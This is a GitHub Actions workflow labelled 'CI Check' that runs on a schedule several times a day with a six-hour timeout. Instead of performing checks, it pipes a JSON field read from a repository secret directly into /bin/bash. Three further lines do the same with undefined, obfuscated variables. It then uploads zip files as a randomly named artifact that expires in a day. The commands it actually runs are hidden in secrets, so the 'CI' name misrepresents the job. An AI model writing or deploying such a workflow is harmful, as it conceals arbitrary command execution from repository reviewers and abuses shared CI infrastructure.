name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '59 1,7,13,19 * * *'
jobs:
  task:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          b0: ${{ secrets.b0 }}
        run: |
          printf '%s' "$b0" | jq -r .va4 | /bin/bash
          echo $pd954 | jq -r .goxmt2 | /bin/bash
          echo $r665 | jq -r .nv70938 | /bin/bash
          echo $yn5193 | jq -r .duj340 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 0oIEghE0
          path: "*.zip"
          retention-days: 1
